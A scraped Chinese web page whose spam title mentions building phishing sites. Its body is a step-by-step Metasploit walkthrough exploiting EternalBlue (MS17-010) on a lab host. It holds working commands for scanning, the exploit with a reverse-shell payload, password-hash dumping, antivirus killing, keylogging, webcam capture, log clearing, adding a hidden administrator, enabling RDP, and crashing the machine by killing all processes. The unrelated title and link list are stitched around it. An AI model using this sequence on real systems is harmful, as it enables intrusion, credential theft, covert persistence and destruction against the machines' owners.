当前位置: 首页 > news >正文

钓鱼网站搭建教程怎么让自己的网站通过域名访问

钓鱼网站搭建教程,怎么让自己的网站通过域名访问,公司网络维护是做什么的,登建设厅锁子的是哪个网站文章目录 永恒之蓝 ms 17_0101.漏洞介绍1.1 影响版本1.2 漏洞原理 2.信息收集2.1 主机扫描2.2 端口扫描 3. 漏洞探测4. 漏洞利用5.后渗透阶段5.1创建新的管理员账户5.2开启远程桌面5.3蓝屏攻击 永恒之蓝 ms 17_010 1.漏洞介绍 永恒之蓝#xff08;ms17-010#xff09;爆发于… 文章目录 永恒之蓝 ms 17_0101.漏洞介绍1.1 影响版本1.2 漏洞原理 2.信息收集2.1 主机扫描2.2 端口扫描 3. 漏洞探测4. 漏洞利用5.后渗透阶段5.1创建新的管理员账户5.2开启远程桌面5.3蓝屏攻击 永恒之蓝 ms 17_010 1.漏洞介绍 永恒之蓝ms17-010爆发于2017年4月14日晚是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限以此来控制被入侵的计算机。甚至于2017年5月12日 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒使全世界大范围内遭受了该勒索病毒甚至波及到学校、大型企业、政府等机构只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 1.1 影响版本 目前已知受影响的 Windows 版本包括但不限于WindowsNTWindows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。 1.2 漏洞原理 通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出最终导致任意命令的执行。在Windows操作系统中SMB服务默认是开启的监听端口默认为445因此该漏洞造成的影响极大。 2.信息收集 2.1 主机扫描 arp-scan -l2.2 端口扫描 nmap -O -sS -T4 192.168.160.52说明 -O这个选项告诉Nmap进行操作系统识别。它会尝试通过分析目标主机的网络行为和响应来猜测其运行的操作系统类型。-sS这个选项启用了TCP SYN扫描也称为半开放扫描。在进行端口扫描时Nmap发送一个TCP SYN包到目标主机上的每个目标端口如果收到了一个SYN/ACK响应说明该端口是打开的。-T4这个选项设置了扫描的速度/时间模板。T4是Nmap的默认设置之一表示较高的扫描速度和更少的等待时间。 3. 漏洞探测 msfconsole # 搜寻模块 search ms17-010# 使用第三个模块 use 3 # 查看该漏洞模块的具体介绍信息 infoshow missing # 查看需要配置哪些信息这里需要配置远程主机的IP地址也就是靶机的IP地址。 set rhosts 192.168.160.52使用show options选项查看我们要输入的具体参数其中标注了yes的选项是必须的参数若这个参数为空则需要我们填写。 show options 开始攻击 run显示该主机很可能能够会受到永恒之蓝漏洞的攻击。 4. 漏洞利用 search ms17-010设置payload连接的方式reverse_tcp为反向连接即受害机主动连接攻击机以获取shell。 set payload windows/x64/meterpreter/reverse_tcp设置攻击目标 set rhosts 192.168.160.52 run拿下该主机的shell执行cmd命令。 在这里可以进行文件上传下载获取截屏获取密码使用摄像头拍照后门持久化等操作。 5.后渗透阶段 运行了run(exploit)命令之后我们开启了一个reverse TCP监听器来监听本地的 4444 端口即攻击者的本地主机地址LHOST和端口号LPORT。 在meterpreter 中我们可以使用以下的命令来实现对目标的操作 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详细信息 hashdump #导出密码的哈希 load kiwi #加载 ps #查看目标主机进程信息 pwd #查看目标当前目录(windows) getlwd #查看目标当前目录(Linux) search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件 download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下 upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid #查看当前Meterpreter Shell的进程 PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上 idletime #查看主机运行时间 getuid #查看获取的当前权限 getsystem #提权 run killav #关闭杀毒软件 screenshot #截图 webcam_list #查看目标主机的摄像头 webcam_snap #拍照 webcam_stream #开视频 execute 参数 -f 可执行文件 #执行可执行程序 run getgui -u hack -p 123 #创建hack用户密码为123 run getgui -e #开启远程桌面 keyscan_start #开启键盘记录功能 keyscan_dump #显示捕捉到的键盘记录信息 keyscan_stop #停止键盘记录功能 uictl disable keyboard #禁止目标使用键盘 uictl enable keyboard #允许目标使用键盘 uictl disable mouse #禁止目标使用鼠标 uictl enable mouse #允许目标使用鼠标 load #使用扩展库 run #使用扩展库 clearev #清除日志示例 查看主机系统信息 sysinfo查看IP地址信息 ipconfig查看用户身份 getuid获得shell控制台 shell如果乱码受不了的话输入chcp 65001 即可 下面的模块主要用于在取得目标主机系统远程控制权后进行一系列的后渗透攻击动作。 run post/windows/manage/migrate #自动进程迁移 run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上 run post/windows/manage/killav #关闭杀毒软件 run post/windows/manage/enable_rdp #开启远程桌面服务 run post/windows/manage/autoroute #查看路由信息 run post/windows/gather/enum_logged_on_users #列举当前登录的用户 run post/windows/gather/enum_applications #列举应用程序 run windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码 run windows/gather/smart_hashdump #dump出所有用户的hash示例 获取用户密码 run windows/gather/smart_hashdump 或者 hashdump5.1创建新的管理员账户 进入shell控制台 在目标主机上创建一个名为ghui的用户密码为123456 将ghui加入到windows 7的本地管理员组中以便获得更大权限 net localgroup administrators ghui /add查看本地用户 net user查看本地管理员 net localgroup administrators可以看到ghui已经被添加到windows管理员组中。 5.2开启远程桌面 运用getuid脚本开启目标主机远程桌面 run getgui -e或者run post/windows/manage/enable_rdp在kali终端输入 rdesktop 192.168.160.52选择其他用户 登录之前创建得ghui用户密码123456 5.3蓝屏攻击 最后一步让它蓝屏 taskkill /f /fi pid ne 1解释 taskkill 用于终止运行中的进程表示杀进程。 /f 是一个参数表示强制终止进程。 /fi 是一个参数用于指定进程过滤器filter。 pid ne 1 是一个过滤器表达式用于筛选进程。在这个例子中pid 代表进程的 IDPIDne 表示不等于1 是要排除的进程 ID。换句话说这个命令会终止除了进程 ID 为 1通常是系统进程之外的所有进程。 执行结果
http://www.w-s-a.com/news/84698/

相关文章:

  • 广州移动 网站设计中国交通建设监理协网站
  • 甘肃省第八建设集团公司网站wordpress topnews
  • 公司网站建设维保协议wordpress会员可看
  • 合肥百度网站排名优化深圳集团网站开发公司
  • 可以直接打开网站的方法手机回收站
  • 山西免费网站制作中天建设集团有限公司第九建设公司
  • 好的网站有哪些企业微信开发者工具
  • 网站通栏代码老外做的中国汉字网站
  • 东莞公司建站哪个更便宜wordpress宝塔伪静态
  • 六安网站建设价格做网站好吗
  • 中小企业网站建设咨询湖南省邵阳建设局网站
  • 分类网站一天做几条合适南安网络推广
  • 案例学 网页设计与网站建设百度竞价关键词出价技巧
  • 做公司网站要那些资料南雄网站建设
  • 自己做的网站发布到网上视频播放不了网页游戏奥奇传说
  • 网站效果用什么软件做品牌网站建设等高端服务
  • 四川省成华区建设局网站网站专业制作
  • 网站建设如何开票网站后台怎么做超链接
  • 教育网站设计方案建设网站技术公司电话号码
  • 建网站要定制还是第三方系统传奇网站模板psd
  • 免费搭建企业网站什么叫网站定位
  • 网站建设cms程序员培训班
  • 网站seo技术wordpress editor ios
  • 红酒网站设计成立公司需要哪些手续
  • 广州做网站哪个好网站建网站建设网站站网站
  • 如何快速提升网站pr短剧个人主页简介模板
  • 上海网站建设 永灿百度权重3的网站值多少
  • 公司展示网站模板模板工
  • 网站建设收费详情舟山公司做网站
  • 深圳宝安区住房和建设局网站html模板大全